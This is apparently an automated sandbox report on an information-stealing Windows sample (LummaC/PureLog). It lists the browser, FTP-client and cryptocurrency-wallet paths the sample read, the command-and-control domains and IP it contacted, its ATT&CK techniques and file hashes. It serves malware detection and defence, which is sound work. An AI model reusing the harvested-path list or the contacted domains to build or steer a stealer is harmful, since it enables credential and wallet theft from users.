                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: Xeno.exe PID: 3020, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: Xeno.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Xeno.exe.b90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Xeno.exe.3f99550.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Xeno.exe.3f99550.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		211
                      Process Injection                      		23
                      Virtualization/Sandbox Evasion                      		2
                      OS Credential Dumping                      		1
                      Query Registry                      		Remote Services1
                      Screen Capture                      		21
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		LSASS Memory231
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		2
                      Non-Application Layer Protocol                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                      Process Injection                      		Security Account Manager23
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares41
                      Data from Local System                      		113
                      Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Deobfuscate/Decode Files or Information                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model3
                      Clipboard Data                      		Protocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                      Obfuscated Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Software Packing                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Timestomp                      		DCSync22
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Xeno.exe47%VirustotalBrowse
                      Xeno.exe61%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                      Xeno.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      jarry-deatile.bond0%Avira URL Cloudsafe
                      pain-temper.bond0%Avira URL Cloudsafe
                      https://sobrattyeu.bond/api70%Avira URL Cloudsafe
                      stripedre-lot.bond0%Avira URL Cloudsafe
                      immolatechallen.bond0%Avira URL Cloudsafe
                      jarry-fixxer.bond0%Avira URL Cloudsafe
                      crookedfoshe.bond0%Avira URL Cloudsafe
                      https://sobrattyeu.bond/0%Avira URL Cloudsafe
                      sobrattyeu.bond0%Avira URL Cloudsafe
                      growthselec.bond0%Avira URL Cloudsafe
                      https://sobrattyeu.bond/TEQN7c0%Avira URL Cloudsafe
                      https://sobrattyeu.bond/api0%Avira URL Cloudsafe
                      strivehelpeu.bond0%Avira URL Cloudsafe
                      https://sobrattyeu.bond/C0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      sobrattyeu.bond
                      		104.21.96.1
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        jarry-deatile.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        immolatechallen.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        stripedre-lot.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        jarry-fixxer.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        sobrattyeu.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        pain-temper.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        crookedfoshe.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        growthselec.bondtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://sobrattyeu.bond/apitrue
                        • Avira URL Cloud: safe
                        		unknown
                        strivehelpeu.bondtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://sobrattyeu.bond/api7Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://sobrattyeu.bond/Xeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://upx.sf.netAmcache.hve.4.drfalse
                          		high
                          https://sobrattyeu.bond/TEQN7cXeno.exe, 00000001.00000002.2942920179.0000000000D22000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://sobrattyeu.bond/CXeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.96.1
                          		sobrattyeu.bondUnited States
                          		13335CLOUDFLARENETUStrue

                          General Information

                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1591988
                          Start date and time:2025-01-15 16:15:13 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 46s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Xeno.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@4/5@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 95%
                          • Number of executed functions: 33
                          • Number of non-executed functions: 108
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.189.173.22, 40.126.32.140, 172.202.163.200, 13.107.246.45
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:16:07API Interceptor8x Sleep call for process: Xeno.exe modified
                          10:16:21API Interceptor1x Sleep call for process: WerFault.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.21.96.1k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                          • www.uzshou.world/kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr
                          gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                          • www.dejikenkyu.cyou/58m5/
                          EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                          • www.mffnow.info/0pqe/
                          zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                          • www.aonline.top/fqlg/
                          QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                          • www.mzkd6gp5.top/3u0p/
                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                          • pelisplus.so/administrator/index.php
                          Recibos.exeGet hashmaliciousFormBookBrowse
                          • www.mffnow.info/1a34/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          sobrattyeu.bondAdobe-Acrobat-Pro-2025.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                          • 104.21.80.1
                          random.exeGet hashmaliciousLummaCBrowse
                          • 104.21.96.1

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUShttp://tweetfeed.liveGet hashmaliciousUnknownBrowse
                          • 104.21.90.88
                          Adobe-Acrobat-Pro-2025.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                          • 104.21.80.1
                          xd.x86.elfGet hashmaliciousMiraiBrowse
                          • 1.13.159.139
                          setup.msiGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          Qj9gUbJBkY.dllGet hashmaliciousWannacryBrowse
                          • 8.44.41.1
                          xd.spc.elfGet hashmaliciousMiraiBrowse
                          • 172.69.125.196
                          http://www.mcpf.co.zaGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          MotivatedFunded.exeGet hashmaliciousLummaC StealerBrowse
                          • 162.159.135.233
                          Set-Up.exeGet hashmaliciousLummaCBrowse
                          • 104.21.75.15
                          http://www.mcpf.co.zaGet hashmaliciousUnknownBrowse
                          • 104.17.25.14

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          a0e9f5d64349fb13191bc781f81f42e1Adobe-Acrobat-Pro-2025.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                          • 104.21.96.1
                          MotivatedFunded.exeGet hashmaliciousLummaC StealerBrowse
                          • 104.21.96.1
                          Set-Up.exeGet hashmaliciousLummaCBrowse
                          • 104.21.96.1
                          ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                          • 104.21.96.1
                          00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                          • 104.21.96.1
                          00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                          • 104.21.96.1
                          138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                          • 104.21.96.1
                          92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                          • 104.21.96.1
                          2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                          • 104.21.96.1

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Xeno.exe_765950b87e97d5d342af7e889eddc96b622feb_0aaebb4a_1d0fc2cc-6029-426a-b8fa-93dceb3eb239\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.8843372462274467
                          Encrypted:false
                          SSDEEP:192:35aGlFV5znpweA0LR3bQ1aOGzuiFfZ24IO8St:JRFvnBbLR3MafzuiFfY4IO8o
                          MD5:37EE175D65AC09999713FC10A881D32C
                          SHA1:D0FD65C0AF63922CEBE6151708B61CDED58DE693
                          SHA-256:A287193AC21230FD2BCC6947C7EC0B650E8A5F1AD3D1ABEFA7D5259D862DA6A0
                          SHA-512:CD55C934D5C3C95201298650EFAFE93EF0BD0DE3EDFD2994ECADFE340A1CBC9405487345D7DDE1BAB40D11BADD058DB0FD7A1DF6B8B2CF49DAF4B2D89D57DF79
                          Malicious:true
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.2.7.7.6.6.7.0.9.9.6.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.2.7.7.6.7.1.3.1.8.4.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.0.f.c.2.c.c.-.6.0.2.9.-.4.2.6.a.-.b.8.f.a.-.9.3.d.c.e.b.3.e.b.2.3.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.0.f.8.a.1.4.-.9.e.1.3.-.4.0.f.f.-.8.a.f.1.-.c.e.3.3.f.7.3.a.7.9.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.e.n.o...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.a.8.-.0.0.0.1.-.0.0.1.4.-.4.4.4.d.-.e.1.6.5.6.0.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.4.7.a.8.0.f.a.4.0.2.1.6.e.f.3.5.c.b.6.6.d.b.b.f.4.5.f.f.d.a.5.e.a.b.c.8.0.3.c.b.!.X.e.n.o...e.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERD33A.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Wed Jan 15 15:16:06 2025, 0x1205a4 type
                          Category:dropped
                          Size (bytes):154379
                          Entropy (8bit):3.7657082819032177
                          Encrypted:false
                          SSDEEP:1536:nA/RbuBojRapN4uE2aO2/LTg1hcASq02dCDEVfetTc1yJ:ADc4uEqILTg15MFw
                          MD5:53A4D7BA332C38E2C2E8DF799F12B3C9
                          SHA1:A76E4F7A72416F4B4592CAC0A04EBCCDF8865907
                          SHA-256:D4941D01F241D9B3417618CD1592F7AFC2F55079BBA998429C437F2196104673
                          SHA-512:2DBD190B3AA995347C6D8118E8172AA816ED19A2FA882BC127FF33CFF2EF050E3BE38584CEE387AAF55E4B4040874620C86D4D8D781848F35FB4D7F3EA69A3F4
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... .......6.g....................................$................/..........`.......8...........T...........($...6......................................................................................................eJ......P.......GenuineIntel............T...........6.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERD3E7.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8356
                          Entropy (8bit):3.6919959755642533
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJ0uX6x6Y9DSU99zgmfK2wVJkprt89bnMsfMtm:R6lXJt6x6YpSU99zgmf0VJLnff7
                          MD5:E4959C54BF96A61D63218F63C1092DD5
                          SHA1:1EF3647DD17C5F33D8ABE52623F55D10F8483DD8
                          SHA-256:D88C073FE21C55D7ED8143EFA33B013E144101A31495266C8792D310CE44A5EA
                          SHA-512:B233FE1327A3F66202CD9159D6286DA4BBEE425667D4604EF01511CBA4A5A9774BCB3C2685764EE5383875863B5350F1CBEF708BFEB0F5074C5B9FDD4A691C7A
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.4.4.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERD417.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4720
                          Entropy (8bit):4.4339663858637515
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsUNJg77aI9bIWpW8VYSYm8M4JwH3dxPcf6FvCM+q8vH3dxPcfEQlHUc2:uIjfUnI7dh7VmJwHQfuKHQfEQdUcUXd
                          MD5:C0063F9992D34163D9870267863675BE
                          SHA1:ED5601A5A7DB33E060929BED08BB4576BC77EC0C
                          SHA-256:B768B90F0F43399164AB0DAC08BD01705663A8E874D4EE8AC8BD1AE0CAE478CC
                          SHA-512:F8E750526003C42D6B8458A9AD81CD87C4899D702CAAADB2148B94FF2E956AD3D629EE641724D18E561FB16F0E0112C92CE81651C89085FD670BC61078D7096D
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677178" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\Windows\appcompat\Programs\Amcache.hve

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.465555639896849
                          Encrypted:false
                          SSDEEP:6144:CIXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABl0uN3dwBCswSbL:nXD94QWlLZMM6YFHZ+L
                          MD5:D4CD3DDBF445C97CD2A9990C09CE3B22
                          SHA1:59C15E25E60BDA68D6753A1635DFDBD8422F777C
                          SHA-256:90C60A2101A8AEE933EC8847C9C613CA2074BD774C4744EA8991D586700F7468
                          SHA-512:855EEFB80185D957B6C908AD70556F30C25422ABE04874B52040F1D3C9DDFF5057AD505C81738EBE9F2E25FC17567580C54EB0533C224988F851287AC1AFB91E
                          Malicious:false
                          Reputation:low
                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz.'f`g................................................................................................................................................................................................................................................................................................................................................0R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.634650577203108
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          • Win32 Executable (generic) a (10002005/4) 49.96%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:Xeno.exe
                          File size:455'792 bytes
                          MD5:1e5f4ee4303aa49c9c32e89132c7b4f9
                          SHA1:47a80fa40216ef35cb66dbbf45ffda5eabc803cb
